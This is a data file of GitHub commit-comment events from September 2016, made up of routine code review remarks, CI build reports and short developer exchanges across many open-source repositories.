{"id":"4528547687","type":"CommitCommentEvent","actor":{"login":"rohitrajiit"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18930633,"position":null,"line":null,"path":null,"commit_id":"57594b3ddb619e61181d0067e4ea7e66211a7e6b","created_at":"2016-09-07T15:50:45Z","updated_at":"2016-09-07T15:50:45Z","body":"GL at LTC"}},"created_at":"2016-09-07T15:50:45Z"}
{"id":"4528550813","type":"CommitCommentEvent","actor":{"login":"tamarazuk"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18930640,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-07T15:51:14Z","updated_at":"2016-09-07T15:51:14Z","body":"@mikejolley I was more suggesting supporting both formats, as they are valid in the US. For Chase Paymentech, there is a new certification test case that involves the use of a ZIP+4 and these merchants would not be able to get certified if WooCommerce doesn't support it at all.\r\n\r\nI know that some gateways like Simplify don't support the dash within the zip code, while others expect it (like Chase Paymentech). You mentioned that USPS doesn't like ZIP+4 at all. Since there are so many different \"opinions\" within integrations, shouldn't the plugin for the integration handle formatting the postcode as needed? Maybe WC core can provide a helper function for this to quickly get the desired US zip format, but that's not needed at all. \r\n\r\nIf a customer or address validation plugin set the postcode as a ZIP+4, then I think an ecommerce system should respect it and display it like that in the admin as well as allow gateways and other integrations to use it. \r\n\r\nFWIW, our Address Validation plugin includes an option to enable/disable the use of ZIP+4 and it is enabled by default. \r\n\r\nWe don't mind WC leaving the normalizing as is now and continuing to remove the dash, as we would then add our own formatting methods to adjust the zip as each of our gateways expect it to be. We would recommend displaying it in the admin and frontend the same way it was entered though, like you do with Brazil codes. \r\n"}},"created_at":"2016-09-07T15:51:14Z"}
{"id":"4528555219","type":"CommitCommentEvent","actor":{"login":"make-all"},"repo":{"name":"make-all/mod_auth_openidc"},"payload":{"comment":{"id":18930650,"position":null,"line":null,"path":null,"commit_id":"6b668d6d23b7dff5c71f61305f12f4acf2b8a097","created_at":"2016-09-07T15:51:53Z","updated_at":"2016-09-07T15:51:53Z","body":"I suspected that this might weaken things, which is why I put a note at the top of the README.md to discourage using g this version when the server has full OpenID support.\r\n\r\nIn my case, the OAuth  2.0 server is under my control, so the \"access tokens obtained for other applications\" part can be kept under control. I can see the risk where public services are used, so I will try to come up with stronger and clear warnings for the README.md, and also push the upstream Phabricator to support OpenId Connect rather than just OAuth 2.0 Code Grant, as I suspect the work involved is fairly similar to what was involved here, and the only reason I went this way is that Phabricator is under very active development so keeping local changes to their codebase synced is more ongoing effort."}},"created_at":"2016-09-07T15:51:53Z"}
{"id":"4528556830","type":"CommitCommentEvent","actor":{"login":"msb81"},"repo":{"name":"setriplette/Amadis-in-Translation"},"payload":{"comment":{"id":18930655,"position":22,"line":125,"path":"XML-and-Schematron/Montalvo/Montalvo_Amadis_1547_4.xml","commit_id":"b30ed0147f676cbd6ffbaa6cfddfb4660d51eb16","created_at":"2016-09-07T15:52:09Z","updated_at":"2016-09-07T15:52:09Z","body":"@setriplette ping"}},"created_at":"2016-09-07T15:52:09Z"}
{"id":"4528564115","type":"CommitCommentEvent","actor":{"login":"GregGoldman"},"repo":{"name":"JimHokanson/matlab_standard_library"},"payload":{"comment":{"id":18930671,"position":null,"line":null,"path":null,"commit_id":"7be13d4131b18b35e5f344d5a81f521d3a94a2cf","created_at":"2016-09-07T15:53:14Z","updated_at":"2016-09-07T15:53:14Z","body":"Thanks for the help! Making a list of guidelines to go by. \r\n\r\nChanges look good. On goDebugHelper: I left a copy of that .m file in global_namespace_functions as well as one in private (these two files are now slightly different). I did this to allow functionality to continue, but if we remove the file goDebugHelper.m from global_namespace_functions (leaving the one in private), it does not work on my end at least (throws an error saying goDebugHelper cannot be found). "}},"created_at":"2016-09-07T15:53:14Z"}
{"id":"4528567870","type":"CommitCommentEvent","actor":{"login":"konklone"},"repo":{"name":"GSA/GSADigitalService"},"payload":{"comment":{"id":18930684,"position":null,"line":null,"path":null,"commit_id":"7c3ee2a3c6a67ce768729ce1e864b0f2db4874a9","created_at":"2016-09-07T15:53:45Z","updated_at":"2016-09-07T15:53:45Z","body":"Did you mean for this to libk to https://github.com/18F/18f-education-discovery/wiki ? I think you want to link to CC0 directly, or more ideally add a `LICENSE.md` that reflects your will (here's our [template](https://github.com/18F/open-source-policy/blob/master/LICENSE.md)) which in turn links to CC0."}},"created_at":"2016-09-07T15:53:45Z"}
{"id":"4528568214","type":"CommitCommentEvent","actor":{"login":"danimaribeiro"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18930685,"position":8,"line":204,"path":"addons/product/data/product_data.xml","commit_id":"f2db00d7acef251354758d6f04f8f3d0ae73b30e","created_at":"2016-09-07T15:53:46Z","updated_at":"2016-09-07T15:53:46Z","body":"This fails if demo data is not enabled.\r\nShouldn't be 'base.main_partner' ?"}},"created_at":"2016-09-07T15:53:46Z"}
{"id":"4528569090","type":"CommitCommentEvent","actor":{"login":"ajurasz"},"repo":{"name":"coderion/youtrack-export"},"payload":{"comment":{"id":18930687,"position":14,"line":14,"path":"src/main/resources/application.yml","commit_id":"0c0938b9da7486bdcee17d15b5055577b1eadce8","created_at":"2016-09-07T15:53:55Z","updated_at":"2016-09-07T15:53:55Z","body":"@toudidel this is public repo :)"}},"created_at":"2016-09-07T15:53:55Z"}
{"id":"4528569173","type":"CommitCommentEvent","actor":{"login":"JoshCode"},"repo":{"name":"JoshCode/gilmore"},"payload":{"comment":{"id":18930688,"position":13,"line":5,"path":"src/main/java/nl/codefox/gilmore/Gilmore.java","commit_id":"dce6c607b25483c53e10e0314a34ac4c1222074e","created_at":"2016-09-07T15:53:56Z","updated_at":"2016-09-07T15:53:56Z","body":"Don't use star includes."}},"created_at":"2016-09-07T15:53:56Z"}
{"id":"4528571872","type":"CommitCommentEvent","actor":{"login":"AlexandreMasta"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18930692,"position":null,"line":null,"path":null,"commit_id":"a29f09e94d24fe12d00debfcb6e7830970536114","created_at":"2016-09-07T15:54:21Z","updated_at":"2016-09-07T15:54:21Z","body":"I fear bad scalability in this one."}},"created_at":"2016-09-07T15:54:21Z"}
{"id":"4528572588","type":"CommitCommentEvent","actor":{"login":"vkku"},"repo":{"name":"vats14aug/Java-For-Beginners"},"payload":{"comment":{"id":18930693,"position":20,"line":20,"path":"Threading/MyThread1.java","commit_id":"51ef773a79c71ce5bf0bf55170b3409a9abbd28e","created_at":"2016-09-07T15:54:27Z","updated_at":"2016-09-07T15:54:27Z","body":"print caught exception here"}},"created_at":"2016-09-07T15:54:27Z"}
{"id":"4528573811","type":"CommitCommentEvent","actor":{"login":"thom-nic"},"repo":{"name":"jamesleesaunders/python-xbee"},"payload":{"comment":{"id":18930700,"position":null,"line":null,"path":null,"commit_id":"e2c81d30266637bbf7ef8eb32e05c8c45e9650ff","created_at":"2016-09-07T15:54:38Z","updated_at":"2016-09-07T15:54:38Z","body":"Hi @jamesleesaunders - yes definitely happy you're picking this up.  Unfortunately I'm not doing any xbee work at the moment and don't have the time to look into this...  It's been so long you're probably much more familiar with the codebase than I am :D\r\n\r\nAs I remember, I basically just had a daemon thread running that would close and re-initialize the serial connection on any error, or loop with a timeout if the channel couldn't be reopened.  \r\n\r\nIn this particular piece of code, I think you understand it but the timeout is purely to prevent a blocking read operation that would prevent the thread from being interrupted or shutdown cleanly.  Hitting a timeout exception is not necessarily a problem - although it's debatable whether you should discard the read bytes assuming you'll get a new packet vs (if it's a very short timeout) you might get the rest of the message if you keep reading into the same packet after the timeout occurs.  I believe the deadline gets pushed out whenever a byte is read which would prevent arbitrary timeouts unless UART communication was significantly interrupted mid-packet.  I don't know if an xbee receiving a wireless packet would start streaming it over the serial until it receives the full, valid packet.  In which case you're probably more likely to be correct if you discarded the read bytes and assume a new packet on the next set of read bytes or just attempt to reset the serial connection but that might be overkill.  "}},"created_at":"2016-09-07T15:54:38Z"}
{"id":"4528580498","type":"CommitCommentEvent","actor":{"login":"zandbelt"},"repo":{"name":"make-all/mod_auth_openidc"},"payload":{"comment":{"id":18930718,"position":null,"line":null,"path":null,"commit_id":"6b668d6d23b7dff5c71f61305f12f4acf2b8a097","created_at":"2016-09-07T15:55:40Z","updated_at":"2016-09-07T15:55:40Z","body":"ok, thanks"}},"created_at":"2016-09-07T15:55:40Z"}
{"id":"4528583487","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18930721,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T15:56:09Z","updated_at":"2016-09-07T15:56:09Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2364 of 2366 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T15:56:09Z"}
{"id":"4528589831","type":"CommitCommentEvent","actor":{"login":"bantuist"},"repo":{"name":"bantuist/bloc-jams"},"payload":{"comment":{"id":18930736,"position":null,"line":null,"path":null,"commit_id":"7fc62097d63e2945fe8a951403a0856e957a0a45","created_at":"2016-09-07T15:57:05Z","updated_at":"2016-09-07T15:57:05Z","body":"Fixed."}},"created_at":"2016-09-07T15:57:05Z"}
{"id":"4528594150","type":"CommitCommentEvent","actor":{"login":"BobDempsey"},"repo":{"name":"BobDempsey/Scratch-Activity"},"payload":{"comment":{"id":18930745,"position":null,"line":null,"path":null,"commit_id":"7a05c84283207e8eb9fa27c1f2104e20768d7798","created_at":"2016-09-07T15:57:44Z","updated_at":"2016-09-07T15:57:44Z","body":"https://scratch.mit.edu/projects/120178987/"}},"created_at":"2016-09-07T15:57:44Z"}
{"id":"4528595632","type":"CommitCommentEvent","actor":{"login":"MartijnKaijser"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18930751,"position":482,"line":665,"path":"xbmc/addons/AddonDatabase.cpp","commit_id":"8f7b6a25d42f719b959e94a25eb02aa600f3386c","created_at":"2016-09-07T15:57:57Z","updated_at":"2016-09-07T15:57:57Z","body":"@Memphiz circular was fixed way back in v14 or so but perhaps it has raised it's head again"}},"created_at":"2016-09-07T15:57:57Z"}
{"id":"4528597130","type":"CommitCommentEvent","actor":{"login":"ajurasz"},"repo":{"name":"coderion/youtrack-export"},"payload":{"comment":{"id":18930759,"position":14,"line":14,"path":"src/main/resources/application.yml","commit_id":"0c0938b9da7486bdcee17d15b5055577b1eadce8","created_at":"2016-09-07T15:58:13Z","updated_at":"2016-09-07T15:58:13Z","body":"@toudidel check this out https://github.com/ulisesbocchio/jasypt-spring-boot"}},"created_at":"2016-09-07T15:58:13Z"}
{"id":"4528601797","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18930775,"position":null,"line":null,"path":null,"commit_id":"654a8bf1b495c39f03d762862684f1e500a09e5f","created_at":"2016-09-07T15:58:52Z","updated_at":"2016-09-07T15:58:52Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_views/default.html](https://github.com/pantheon-systems/documentation/commit/31b2d2154d95e55a9ec3fdf1052de671ceb49593/source/_views/default.html)\n- [source/_views/terminuspage.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/_views/terminuspage.html)\n- [source/docs/_terminuspages/03-examples.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.html)\n- [source/docs/_terminuspages/03-examples.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/03-examples.md)\n- [source/docs/_terminuspages/04-extend.html](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.html)\n- [source/docs/_terminuspages/04-extend.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/04-extend.md)\n- [source/docs/_terminuspages/05-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-commands.md)\n- [source/docs/_terminuspages/05-plugins.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/05-plugins.md)\n- [source/docs/_terminuspages/06-commands.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-commands.md)\n- [source/docs/_terminuspages/06-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/06-versions.md)\n- [source/docs/_terminuspages/07-versions.md](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/_terminuspages/07-versions.md)\n- [source/docs/assets/css/main.css](https://github.com/pantheon-systems/documentation/commit/aab7876a8f8aff54867a4b708e39551e5f9897ea/source/docs/assets/css/main.css)\n- [app/config/sculpin_site.yml](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/app/config/sculpin_site.yml)\n- [source/_partials/terminus_navbar.html](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/_partials/terminus_navbar.html)\n- [source/docs/_terminuspages/01-getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/01-getting-started.md)\n- [source/docs/_terminuspages/02-install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/02-install.md)\n- [source/docs/_terminuspages/commands.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/commands.md)\n- [source/docs/_terminuspages/contribute.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute.md)\n- [source/docs/_terminuspages/contribute/style-guide.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/contribute/style-guide.md)\n- [source/docs/_terminuspages/examples.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/examples.md)\n- [source/docs/_terminuspages/extend.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend.md)\n- [source/docs/_terminuspages/extend/create-plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/create-plugins.md)\n- [source/docs/_terminuspages/extend/plugins.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/extend/plugins.md)\n- [source/docs/_terminuspages/getting-started.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/getting-started.md)\n- [source/docs/_terminuspages/install.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/install.md)\n- [source/docs/_terminuspages/versions.md](https://github.com/pantheon-systems/documentation/commit/d119b408ff2c41f305b7bf8bcfd80cd59cade017/source/docs/_terminuspages/versions.md)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/654a8bf1b495c39f03d762862684f1e500a09e5f/scripts/deploy-multidev.sh)\n"}},"created_at":"2016-09-07T15:58:52Z"}
{"id":"4528606478","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18930785,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T15:59:35Z","updated_at":"2016-09-07T15:59:35Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T15:59:35Z"}
{"id":"4528612022","type":"CommitCommentEvent","actor":{"login":"rampency"},"repo":{"name":"githubteacher/devs-september"},"payload":{"comment":{"id":18930797,"position":7,"line":7,"path":"eacarter-detroit.md","commit_id":"49d0bea36a7e58ff2a2a898ce647a30b79450b3c","created_at":"2016-09-07T16:00:28Z","updated_at":"2016-09-07T16:00:28Z","body":"i shall fast then go there and eat 2 of these"}},"created_at":"2016-09-07T16:00:28Z"}
{"id":"4528615876","type":"CommitCommentEvent","actor":{"login":"vlad1456"},"repo":{"name":"githubteacher/devs-september"},"payload":{"comment":{"id":18930802,"position":1,"line":2,"path":"MichaelCrimando-Detroit.md","commit_id":"75bc3c68c218b9b88a1b0201a86518a0c84d924c","created_at":"2016-09-07T16:01:00Z","updated_at":"2016-09-07T16:01:00Z","body":"This is a comment"}},"created_at":"2016-09-07T16:01:00Z"}
{"id":"4528616037","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18930803,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T16:01:02Z","updated_at":"2016-09-07T16:01:02Z","body":"FixCentroidForNonconvex (JasonGlazer) - i386-Windows-7-VisualStudio-12: OK (2330 of 2332 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T16:01:02Z"}
{"id":"4528622494","type":"CommitCommentEvent","actor":{"login":"nicksuch"},"repo":{"name":"Upper-Polo/todo_list"},"payload":{"comment":{"id":18930816,"position":null,"line":null,"path":null,"commit_id":"8a8e4a9f27ba06711c0ccddbbc1cab037c8f5259","created_at":"2016-09-07T16:01:57Z","updated_at":"2016-09-07T16:01:57Z","body":"Closes #4 "}},"created_at":"2016-09-07T16:01:57Z"}
{"id":"4528628641","type":"CommitCommentEvent","actor":{"login":"aszahrani"},"repo":{"name":"aszahrani/hello-world"},"payload":{"comment":{"id":18930826,"position":null,"line":null,"path":null,"commit_id":"d4199cf58a07dd5d9ad601054e9a199f08013b8d","created_at":"2016-09-07T16:02:53Z","updated_at":"2016-09-07T16:02:53Z","body":"content for non-telepathic human"}},"created_at":"2016-09-07T16:02:53Z"}
{"id":"4528630116","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18930828,"position":null,"line":null,"path":null,"commit_id":"e0e9220a45787241dda8257f9bbc7b73d523f2ae","created_at":"2016-09-07T16:03:07Z","updated_at":"2016-09-07T16:03:07Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QQr5ON87SQ-rso3uNcFiww"}},"created_at":"2016-09-07T16:03:07Z"}
{"id":"4528632967","type":"CommitCommentEvent","actor":{"login":"JKE-be"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18930835,"position":8,"line":204,"path":"addons/product/data/product_data.xml","commit_id":"f2db00d7acef251354758d6f04f8f3d0ae73b30e","created_at":"2016-09-07T16:03:32Z","updated_at":"2016-09-07T16:03:32Z","body":"Hello\r\nYes, it Has been done in wrong place!\r\nit has been already fixed in saas-13 branch but not already backported to master...\r\n\r\nhttps://github.com/odoo/odoo/commit/a5e03c1bf47e43dea826ec8ad9583af9863f48f7"}},"created_at":"2016-09-07T16:03:32Z"}
{"id":"4528638729","type":"CommitCommentEvent","actor":{"login":"Marco01809"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18930850,"position":69,"line":161,"path":"scripts/jobs/cron_letsencrypt.php","commit_id":"e4887362ec33d6ee191a0df27303ea74de05d54e","created_at":"2016-09-07T16:04:22Z","updated_at":"2016-09-07T16:04:22Z","body":"`PHP Notice:  Undefined index: id in /var/www/froxlor/scripts/jobs/cron_letsencrypt.php on line 161`\r\n\r\nCauses a new certificate to be acquired every time the `letsencrypt` cronjob runs."}},"created_at":"2016-09-07T16:04:22Z"}
{"id":"4528640066","type":"CommitCommentEvent","actor":{"login":"augustoamerico"},"repo":{"name":"rstudio/bookdown-demo"},"payload":{"comment":{"id":18930856,"position":null,"line":null,"path":null,"commit_id":"23ba576aa59b84b0e2b3b07be7fcf60e655985b8","created_at":"2016-09-07T16:04:35Z","updated_at":"2016-09-07T16:04:35Z","body":"Noted @yihui ! Thank you very much for the feedback!"}},"created_at":"2016-09-07T16:04:35Z"}
{"id":"4528640937","type":"CommitCommentEvent","actor":{"login":"JKE-be"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18930860,"position":8,"line":204,"path":"addons/product/data/product_data.xml","commit_id":"f2db00d7acef251354758d6f04f8f3d0ae73b30e","created_at":"2016-09-07T16:04:42Z","updated_at":"2016-09-07T16:04:42Z","body":"Oups... backported => forwardported"}},"created_at":"2016-09-07T16:04:42Z"}
{"id":"4528642253","type":"CommitCommentEvent","actor":{"login":"CodyJavi"},"repo":{"name":"CodyJavi/prueba"},"payload":{"comment":{"id":18930864,"position":null,"line":null,"path":null,"commit_id":"8f00ea32fe7b291c61725d859aaed84f3fa2b45f","created_at":"2016-09-07T16:04:55Z","updated_at":"2016-09-07T16:04:55Z","body":"Deberías especificar, al menos, si te gustan cocinadas..."}},"created_at":"2016-09-07T16:04:55Z"}
{"id":"4528642264","type":"CommitCommentEvent","actor":{"login":"mpiecora"},"repo":{"name":"mauricetmeyer/OP1Bitwig"},"payload":{"comment":{"id":18930865,"position":null,"line":null,"path":null,"commit_id":"d3b7f4e4c3982042fd5f60e0e48c336b386cb323","created_at":"2016-09-07T16:04:55Z","updated_at":"2016-09-07T16:04:55Z","body":"I tired it and it didn't work for me. When I changed it to Generic midi keyboard the OP-1 started working again. And am I to understand you can edit clips on the Ableton version? cause that is amazing\r\n\r\nCould I be doing anything wrong? I really want this to work! :D"}},"created_at":"2016-09-07T16:04:55Z"}
{"id":"4528645660","type":"CommitCommentEvent","actor":{"login":"Nicofisi"},"repo":{"name":"tim740/skAliases"},"payload":{"comment":{"id":18930868,"position":null,"line":null,"path":null,"commit_id":"15a369944fe8c9892f73216456e3176ee9cca358","created_at":"2016-09-07T16:05:27Z","updated_at":"2016-09-07T16:05:27Z","body":"okay, nice!"}},"created_at":"2016-09-07T16:05:27Z"}
{"id":"4528648235","type":"CommitCommentEvent","actor":{"login":"lsetiawan"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":18930874,"position":null,"line":null,"path":null,"commit_id":"7ab5b64dbca84dc5cfc87902870f59bbbc40c2de","created_at":"2016-09-07T16:05:50Z","updated_at":"2016-09-07T16:05:50Z","body":"Wouldn't this end up being a little redundant with the People list? I have placed Affiliations there and combined the form so that one doesn't have to go back and forth. I think that we should just add the `isprimaryorganizationcontact` and `primaryemail` into the changelist view within people.\r\n\r\nRight now, within the people changelist one can search by affiliations, similar to your affiliation changelist. Thanks."}},"created_at":"2016-09-07T16:05:50Z"}
{"id":"4528649437","type":"CommitCommentEvent","actor":{"login":"saracope"},"repo":{"name":"GSA/GSADigitalService"},"payload":{"comment":{"id":18930878,"position":null,"line":null,"path":null,"commit_id":"7c3ee2a3c6a67ce768729ce1e864b0f2db4874a9","created_at":"2016-09-07T16:06:02Z","updated_at":"2016-09-07T16:06:02Z","body":"Ha, yep, needs fixed. That's what I get for doing a quick copy/paste. "}},"created_at":"2016-09-07T16:06:02Z"}
{"id":"4528661343","type":"CommitCommentEvent","actor":{"login":"woodruffw"},"repo":{"name":"woodruffw/screenfetch-c"},"payload":{"comment":{"id":18930893,"position":124,"line":411,"path":"src/plat/win32/detect.c","commit_id":"6c6bd58ae843ee9bf782a7152db7a5d30e41719d","created_at":"2016-09-07T16:07:58Z","updated_at":"2016-09-07T16:07:58Z","body":"Small typo here (\"Command Promt\")."}},"created_at":"2016-09-07T16:07:58Z"}
{"id":"4528663515","type":"CommitCommentEvent","actor":{"login":"DanielZlotin"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":18930899,"position":null,"line":null,"path":null,"commit_id":"49a1aed390effbf2276a306e32ea27e01ab7ba25","created_at":"2016-09-07T16:08:19Z","updated_at":"2016-09-07T16:08:19Z","body":"uncle Carmeli ❤️ "}},"created_at":"2016-09-07T16:08:19Z"}
{"id":"4528672571","type":"CommitCommentEvent","actor":{"login":"atarallo"},"repo":{"name":"lyndell/TECMINT_MONITOR"},"payload":{"comment":{"id":18930925,"position":null,"line":null,"path":null,"commit_id":"c14481bfbf1273856c010376ece836e79d70fc55","created_at":"2016-09-07T16:09:44Z","updated_at":"2016-09-07T16:09:44Z","body":"I've added this code snippet on the development branch. Thanks for this idea. "}},"created_at":"2016-09-07T16:09:44Z"}
{"id":"4528672646","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18930926,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-07T16:09:45Z","updated_at":"2016-09-07T16:09:45Z","body":"synapsePlayer.transfer() doesn't work :/"}},"created_at":"2016-09-07T16:09:45Z"}
{"id":"4528674266","type":"CommitCommentEvent","actor":{"login":"dvoytenko"},"repo":{"name":"andreban/amp-publisher-sample"},"payload":{"comment":{"id":18930930,"position":49,"line":49,"path":"controllers/oauth-server/index.js","commit_id":"2665cb43191b467ca6da0fbc35bd5d89d38716c1","created_at":"2016-09-07T16:10:01Z","updated_at":"2016-09-07T16:10:01Z","body":"Is this a web-safe version of base64?"}},"created_at":"2016-09-07T16:10:01Z"}
{"id":"4528675046","type":"CommitCommentEvent","actor":{"login":"vkku"},"repo":{"name":"vats14aug/Java-For-Beginners"},"payload":{"comment":{"id":18930933,"position":20,"line":20,"path":"Threading/MyThread1.java","commit_id":"51ef773a79c71ce5bf0bf55170b3409a9abbd28e","created_at":"2016-09-07T16:10:11Z","updated_at":"2016-09-07T16:10:11Z","body":"Exception need to be added."}},"created_at":"2016-09-07T16:10:11Z"}
{"id":"4528681076","type":"CommitCommentEvent","actor":{"login":"Jeremiaszec"},"repo":{"name":"Obijuan/freecad-key-chain-library"},"payload":{"comment":{"id":18930948,"position":null,"line":null,"path":null,"commit_id":"fb14d60dbee79c5f3fc2c337baccaa7eccaec75f","created_at":"2016-09-07T16:11:08Z","updated_at":"2016-09-07T16:11:08Z","body":"Esta es mi primera solicitud de contribucion.\r\n­Por favor, acéptamela Obijuan."}},"created_at":"2016-09-07T16:11:08Z"}
{"id":"4528685612","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18930960,"position":null,"line":null,"path":null,"commit_id":"91fab1147224a4c6050f807e1aec50f2ed940f99","created_at":"2016-09-07T16:11:52Z","updated_at":"2016-09-07T16:11:52Z","body":"@pledbrook, all issues fixed in c47331d2e8859d3d2f327a087e00a81abfc5a797. Thanks!"}},"created_at":"2016-09-07T16:11:52Z"}
